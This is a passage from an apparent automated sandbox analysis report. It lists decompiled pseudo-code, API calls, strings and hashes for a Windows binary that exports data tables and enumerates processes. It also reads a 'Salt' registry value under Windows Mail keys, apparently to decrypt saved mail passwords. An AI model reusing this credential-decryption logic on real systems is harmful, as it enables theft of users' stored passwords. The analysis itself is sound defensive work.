                                                                                0x0040b045
                                                                                0x0040b047
                                                                                0x0040b04f
                                                                                0x0040b051
                                                                                0x0040b051
                                                                                0x0040b045
                                                                                0x0040b06a
                                                                                0x0040b070
                                                                                0x0040b076
                                                                                0x0040b078
                                                                                0x0040b078
                                                                                0x0040b092

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040AF3C
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040AF4D
                                                                                • strrchr.MSVCRT ref: 0040AF5C
                                                                                • strcat.MSVCRT(00000000,.cfg), ref: 0040AF76
                                                                                • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AFAA
                                                                                • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AFBB
                                                                                • GetWindowPlacement.USER32(?,?), ref: 0040B051
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                                                • String ID: .cfg$0@$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                • API String ID: 1301239246-2014360536
                                                                                • Opcode ID: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                                                • Instruction ID: 2fe98fd5fda5e8878426aecce951da02ffd08f2862891724b98557ab80592e30
                                                                                • Opcode Fuzzy Hash: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                                                • Instruction Fuzzy Hash: 3A413972940118ABCB61DB54CC88FDAB7BCEB58304F4441AAF509E7191DB74ABC5CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409482, Relevance: 25.7, APIs: 10, Strings: 7, Instructions: 182stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 80%
                                                                                			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* __edi;
				void* _t83;
				void* _t100;
				char* _t103;
				intOrPtr* _t120;
				signed int _t121;
				char _t139;
				signed int _t152;
				signed int _t153;
				signed int _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t120 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t121 = 0xc;
				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
				asm("movsb");
				_t156 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t160 = _t158 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
					_t160 = _t160 + 0x14;
				}
				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t156;
				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
					while(1) {
						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
							strcpy( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t156;
						_t157 = _a8;
						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
						E0040F071(_v28,  &_v184);
						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
						_t153 = _t152 * 0x14;
						if(_t100 == 0xffffffff) {
							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
						} else {
							_push( *(_t153 + _v12 + 0x10));
							_push(E0040F071(_t100,  &_v492));
							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
							_t160 = _t160 + 0x10;
						}
						_t103 =  *(_t120 + 0x50);
						_t139 =  *_t103;
						if(_t139 == 0 || _t139 == 0x20) {
							strcat(_t103, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
						E00405EFD(_a4,  *(_t120 + 0x4c));
						_t160 = _t160 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
							goto L14;
						}
						_t156 = 0;
					}
				}
				L14:
				E00405EFD(_a4, "</table><p>");
				return E00405EFD(_a4, 0x412b1c);
			}































                                                                                0x00409482
                                                                                0x0040949b
                                                                                0x004094a2
                                                                                0x004094a9
                                                                                0x004094b5
                                                                                0x004094b7
                                                                                0x004094ba
                                                                                0x004094c1
                                                                                0x004094c5
                                                                                0x004094d4
                                                                                0x004094db
                                                                                0x004094e7
                                                                                0x004094eb
                                                                                0x004094f2
                                                                                0x004094f7
                                                                                0x00409503
                                                                                0x00409506
                                                                                0x0040951f
                                                                                0x00409524
                                                                                0x00409524
                                                                                0x0040952f
                                                                                0x00409539
                                                                                0x0040953c
                                                                                0x00409546
                                                                                0x0040954c
                                                                                0x0040955b
                                                                                0x00409566
                                                                                0x0040956c
                                                                                0x0040956f
                                                                                0x00409573
                                                                                0x00409577
                                                                                0x0040957f
                                                                                0x00409582
                                                                                0x0040958d
                                                                                0x0040959a
                                                                                0x004095ae
                                                                                0x004095bc
                                                                                0x004095c3
                                                                                0x004095c6
                                                                                0x004095cc
                                                                                0x00409601
                                                                                0x004095ce
                                                                                0x004095d1
                                                                                0x004095e4
                                                                                0x004095ed
                                                                                0x004095f2
                                                                                0x004095f2
                                                                                0x00409608
                                                                                0x0040960b
                                                                                0x0040960f
                                                                                0x0040961c
                                                                                0x00409622
                                                                                0x0040962c
                                                                                0x00409650
                                                                                0x0040965b
                                                                                0x00409660
                                                                                0x00409663
                                                                                0x0040966c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409544
                                                                                0x00409544
                                                                                0x00409546
                                                                                0x00409672
                                                                                0x0040967a
                                                                                0x00409692

                                                                                APIs
                                                                                • memset.MSVCRT ref: 004094A2
                                                                                • memset.MSVCRT ref: 004094C5
                                                                                • memset.MSVCRT ref: 004094DB
                                                                                • memset.MSVCRT ref: 004094EB
                                                                                • sprintf.MSVCRT ref: 0040951F
                                                                                • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                                                • sprintf.MSVCRT ref: 004095ED
                                                                                • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                                                  • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                                                • strcpy.MSVCRT(?,?), ref: 00409601
                                                                                • sprintf.MSVCRT ref: 00409650
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                • API String ID: 2822972341-601624466
                                                                                • Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                • Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
                                                                                • Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                • Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409EC4, Relevance: 25.6, APIs: 17, Instructions: 108windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00409EC4(void* __eax) {
				void* _v36;
				long _v40;
				void* _v44;
				void* _v56;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				void* _t47;

				_t40 = ImageList_Create;
				_t47 = __eax;
				_t44 = __imp__ImageList_SetImageCount;
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
					 *(_t47 + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
				}
				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
					 *(_t47 + 0x190) = _t34;
					 *_t44(_t34, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
				}
				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
				 *(_t47 + 0x188) = _t21;
				 *_t44(_t21, 2);
				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
				_t42 = _t24;
				 *_t44( *(_t47 + 0x188), 0);
				_t26 = GetSysColor(0xf);
				_v40 = _t26;
				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
				DeleteObject(_v56);
				DeleteObject(_t42);
				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
			}
















                                                                                0x00409ec7
                                                                                0x00409ed5
                                                                                0x00409edf
                                                                                0x00409ee5
                                                                                0x00409ef1
                                                                                0x00409ef6
                                                                                0x00409efc
                                                                                0x00409f11
                                                                                0x00409f11
                                                                                0x00409f1a
                                                                                0x00409f26
                                                                                0x00409f2b
                                                                                0x00409f31
                                                                                0x00409f46
                                                                                0x00409f46
                                                                                0x00409f52
                                                                                0x00409f57
                                                                                0x00409f5d
                                                                                0x00409f93
                                                                                0x00409f97
                                                                                0x00409fa1
                                                                                0x00409fa3
                                                                                0x00409fa7
                                                                                0x00409fb8
                                                                                0x00409fc2
                                                                                0x00409fcf
                                                                                0x00409fdb
                                                                                0x00409fde
                                                                                0x0040a004

                                                                                APIs
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                                                • SendMessageA.USER32 ref: 00409F11
                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                                                • SendMessageA.USER32 ref: 00409F46
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                                                • LoadImageA.USER32 ref: 00409F7B
                                                                                • LoadImageA.USER32 ref: 00409F97
                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                                                • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                                                • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                                                • DeleteObject.GDI32(?), ref: 00409FDB
                                                                                • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                                                • SendMessageA.USER32 ref: 00409FFC
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                                • String ID:
                                                                                • API String ID: 3411798969-0
                                                                                • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                                                • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B841, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 70%
                                                                                			E0040B841(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push("/shtml");
				L004115B2();
				if(__eax != 0) {
					_push("/sverhtml");
					L004115B2();
					if(__eax != 0) {
						_push("/sxml");
						L004115B2();
						if(__eax != 0) {
							_push("/stab");
							L004115B2();
							if(__eax != 0) {
								_push("/scomma");
								L004115B2();
								if(__eax != 0) {
									_push("/stabular");
									L004115B2();
									if(__eax != 0) {
										_push("/skeepass");
										L004115C4();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 3;
										return _t5;
									}
								} else {
									_t6 = 7;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 6;
							return _t8;
						}
					} else {
						_t9 = 5;
						return _t9;
					}
				} else {
					_t10 = 4;
					return _t10;
				}
			}









                                                                                0x0040b842
                                                                                0x0040b847
                                                                                0x0040b850
                                                                                0x0040b857
                                                                                0x0040b85c
                                                                                0x0040b865
                                                                                0x0040b86c
                                                                                0x0040b871
                                                                                0x0040b87a
                                                                                0x0040b881
                                                                                0x0040b886
                                                                                0x0040b88f
                                                                                0x0040b896
                                                                                0x0040b89b
                                                                                0x0040b8a4
                                                                                0x0040b8ab
                                                                                0x0040b8b0
                                                                                0x0040b8b9
                                                                                0x0040b8c0
                                                                                0x0040b8c5
                                                                                0x0040b8cc
                                                                                0x0040b8d6
                                                                                0x0040b8bb
                                                                                0x0040b8bd
                                                                                0x0040b8be
                                                                                0x0040b8be
                                                                                0x0040b8a6
                                                                                0x0040b8a8
                                                                                0x0040b8a9
                                                                                0x0040b8a9
                                                                                0x0040b891
                                                                                0x0040b893
                                                                                0x0040b894
                                                                                0x0040b894
                                                                                0x0040b87c
                                                                                0x0040b87e
                                                                                0x0040b87f
                                                                                0x0040b87f
                                                                                0x0040b867
                                                                                0x0040b869
                                                                                0x0040b86a
                                                                                0x0040b86a
                                                                                0x0040b852
                                                                                0x0040b854
                                                                                0x0040b855
                                                                                0x0040b855

                                                                                APIs
                                                                                • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                                                • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _stricmp
                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                • API String ID: 2884411883-1959339147
                                                                                • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                                                • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F243, Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 114stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void _v771;
				char _v772;
				void _v1027;
				char _v1028;
				char _v1284;
				char _v2308;
				char _t47;
				intOrPtr* _t50;
				void* _t57;
				intOrPtr* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				_v1028 = 0;
				memset( &_v1027, 0, 0xfe);
				_v772 = 0;
				memset( &_v771, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t77 = _t76 + 0x24;
				if(_a16 != 0xffffffff) {
					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
					_t77 = _t77 + 0x14;
				}
				if(_a20 != 0xffffffff) {
					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
					strcpy( &_v516, "</font>");
					_t77 = _t77 + 0x1c;
				}
				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
				E00405EFD(_a4,  &_v2308);
				_t47 = _a12;
				_t78 = _t77 + 0x14;
				if(_t47 > 0) {
					_t73 = _a8 + 4;
					_a16 = _t47;
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						_t50 =  *_t73;
						_t79 = _t78 + 0xc;
						if( *_t50 == 0) {
							_v260 = 0;
						} else {
							sprintf( &_v260, " width=\"%s\"", _t50);
							_t79 = _t79 + 0xc;
						}
						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
						_t57 = E00405EFD(_a4,  &_v2308);
						_t78 = _t79 + 0x20;
						_t73 = _t73 + 8;
						_t34 =  &_a16;
						 *_t34 = _a16 - 1;
					} while ( *_t34 != 0);
					return _t57;
				}
				return _t47;
			}





















                                                                                0x0040f25e
                                                                                0x0040f264
                                                                                0x0040f272
                                                                                0x0040f278
                                                                                0x0040f286
                                                                                0x0040f28c
                                                                                0x0040f291
                                                                                0x0040f298
                                                                                0x0040f2b6
                                                                                0x0040f2bb
                                                                                0x0040f2bb
                                                                                0x0040f2c2
                                                                                0x0040f2e0
                                                                                0x0040f2f1
                                                                                0x0040f2f6
                                                                                0x0040f2f6
                                                                                0x0040f30c
                                                                                0x0040f31b
                                                                                0x0040f320
                                                                                0x0040f323
                                                                                0x0040f328
                                                                                0x0040f332
                                                                                0x0040f335
                                                                                0x0040f338
                                                                                0x0040f341
                                                                                0x0040f347
                                                                                0x0040f34c
                                                                                0x0040f34e
                                                                                0x0040f353
                                                                                0x0040f36c
                                                                                0x0040f355
                                                                                0x0040f362
                                                                                0x0040f367
                                                                                0x0040f367
                                                                                0x0040f396
                                                                                0x0040f3a5
                                                                                0x0040f3aa
                                                                                0x0040f3ad
                                                                                0x0040f3b0
                                                                                0x0040f3b0
                                                                                0x0040f3b0
                                                                                0x00000000
                                                                                0x0040f3b5
                                                                                0x0040f3b9

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: sprintf$memset$strcpy
                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                • API String ID: 898937289-3842416460
                                                                                • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                                                • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E0DA, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040E0DA() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x417518 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryA("psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
					 *0x416fec = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x416fe4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
							 *0x416fdc = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x41710c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x416fe8 = _t2;
									if(_t2 != 0) {
										 *0x417518 = 1;
									}
								}
							}
						}
					}
					if( *0x417518 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}






                                                                                0x0040e0e1
                                                                                0x0040e171
                                                                                0x0040e171
                                                                                0x0040e0ed
                                                                                0x0040e0f3
                                                                                0x0040e0f7
                                                                                0x0040e170
                                                                                0x00000000
                                                                                0x0040e0f9
                                                                                0x0040e106
                                                                                0x0040e10a
                                                                                0x0040e10f
                                                                                0x0040e117
                                                                                0x0040e11b
                                                                                0x0040e120
                                                                                0x0040e128
                                                                                0x0040e12c
                                                                                0x0040e131
                                                                                0x0040e139
                                                                                0x0040e13d
                                                                                0x0040e142
                                                                                0x0040e14a
                                                                                0x0040e14e
                                                                                0x0040e153
                                                                                0x0040e155
                                                                                0x0040e155
                                                                                0x0040e153
                                                                                0x0040e142
                                                                                0x0040e131
                                                                                0x0040e120
                                                                                0x0040e167
                                                                                0x0040e16a
                                                                                0x0040e16a
                                                                                0x00000000
                                                                                0x0040e167

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                • API String ID: 2449869053-232097475
                                                                                • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                                                • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410525, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136stringregistryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v6;
				char _v7;
				char _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				short* _v24;
				unsigned int _v28;
				char* _v32;
				int _v36;
				intOrPtr _v40;
				signed int _v44;
				void _v299;
				char _v300;
				void _v555;
				char _v556;
				char _v1080;
				void* __esi;
				int _t56;
				intOrPtr _t58;
				intOrPtr _t64;
				char _t92;
				char* _t93;
				void* _t100;
				signed int _t102;
				signed int _t107;
				intOrPtr _t108;
				void* _t113;

				_t113 = __eflags;
				_t100 = __edx;
				_t93 = __eax;
				E004046D7( &_v1080);
				if(E004047A0( &_v1080, _t113) != 0) {
					_t56 = strlen(_t93);
					asm("cdq");
					_t107 = _t56 - _t100 >> 1;
					_t2 = _t107 + 1; // 0x1
					_t58 = _t2;
					L004115D0();
					_t102 = 0;
					_t96 = _t58;
					_v16 = _t58;
					if(_t107 > 0) {
						do {
							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
							_v7 = _t93[1 + _t102 * 2];
							_v6 = 0;
							_t92 = E00406512( &_v8);
							_t96 = _v16;
							 *((char*)(_t102 + _v16)) = _t92;
							_t102 = _t102 + 1;
						} while (_t102 < _t107);
					}
					_v556 = 0;
					memset( &_v555, 0, 0xff);
					_v12 = 0;
					_v300 = 0;
					memset( &_v299, 0, 0xfe);
					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
					if(_t64 != 1) {
						__eflags = _t64 - 2;
						if(_t64 == 2) {
							_push("Software\\Microsoft\\Windows Live Mail");
							goto L7;
						}
					} else {
						_push("Software\\Microsoft\\Windows Mail");
						L7:
						strcpy( &_v300, ??);
						_pop(_t96);
					}
					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
						_v12 = 0xff;
						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
						RegCloseKey(_v20);
					}
					_v40 = _v16;
					_v36 = _v12;
					_v32 =  &_v556;
					_v44 = _t107;
					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
						_t108 = _a8;
						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
						(_t108 + 0x400)[_v28 >> 1] = 0;
						LocalFree(_v24);
					}
					_push(_v16);
					L004115D6();
				}
				return E004047F1( &_v1080);
			}































                                                                                0x00410525
                                                                                0x00410525
                                                                                0x00410536
                                                                                0x00410538
                                                                                0x00410544
                                                                                0x0041054c
                                                                                0x00410551
                                                                                0x00410556
                                                                                0x00410558
                                                                                0x00410558
                                                                                0x0041055c
                                                                                0x00410562
                                                                                0x00410566
                                                                                0x00410567
                                                                                0x0041056a
                                                                                0x0041056c
                                                                                0x0041056f
                                                                                0x00410576
                                                                                0x0041057d
                                                                                0x00410581
                                                                                0x00410587
                                                                                0x0041058a
                                                                                0x0041058d
                                                                                0x0041058e
                                                                                0x0041056c
                                                                                0x004105a1
                                                                                0x004105a8
                                                                                0x004105bc
                                                                                0x004105bf
                                                                                0x004105c5
                                                                                0x004105cd
                                                                                0x004105d9
                                                                                0x004105e2
                                                                                0x004105e5
                                                                                0x004105e7
                                                                                0x00000000
                                                                                0x004105e7
                                                                                0x004105db
                                                                                0x004105db
                                                                                0x004105ec
                                                                                0x004105f3
                                                                                0x004105f9
                                                                                0x004105f9
                                                                                0x00410614
                                                                                0x00410629
                                                                                0x0041062c
                                                                                0x00410637
                                                                                0x00410637
                                                                                0x00410640
                                                                                0x00410646
                                                                                0x0041064f
                                                                                0x00410664
                                                                                0x0041066e
                                                                                0x00410670
                                                                                0x00410688
                                                                                0x00410693
                                                                                0x0041069d
                                                                                0x0041069d
                                                                                0x004106a3
                                                                                0x004106a6
                                                                                0x004106ac
                                                                                0x004106bb

                                                                                APIs
                                                                                  • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                  • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                                  • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
